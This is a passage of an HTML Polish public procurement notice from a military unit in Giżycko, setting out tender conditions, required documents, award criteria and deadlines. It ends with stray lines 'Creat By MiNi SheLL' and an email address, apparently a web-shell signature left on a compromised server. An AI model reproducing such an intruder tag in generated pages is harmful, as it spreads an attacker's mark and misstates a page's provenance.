sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego załącznik nr 1 do SIWZ. DOWÓD WNIESIENIA WADIUM. PEŁNOMOCNICTWO złożone w formie oryginału lub kopii poświadczonej notarialnie. W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru, pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy. W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu zgodnie z art. 23 ustawy Pzp. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia pisemne, w oryginale, zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 
z zastrzeżeniem § 11 umowy. Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego, klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia, wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy. Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2014r. Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl.http://www.bip.mon.gov.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352
UL. NOWOWIEJSKA 20
11-500 GIŻYCKO
BUDYNEK SZTABU - SEKRETARIAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 08:00, miejsce: EDNOSTKA WOJSKOWA NR 4352
UL. NOWOWIEJSKA 20
11-500 GIŻYCKO
BUDYNEK SZTABU - KANCELARIA JAWNA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com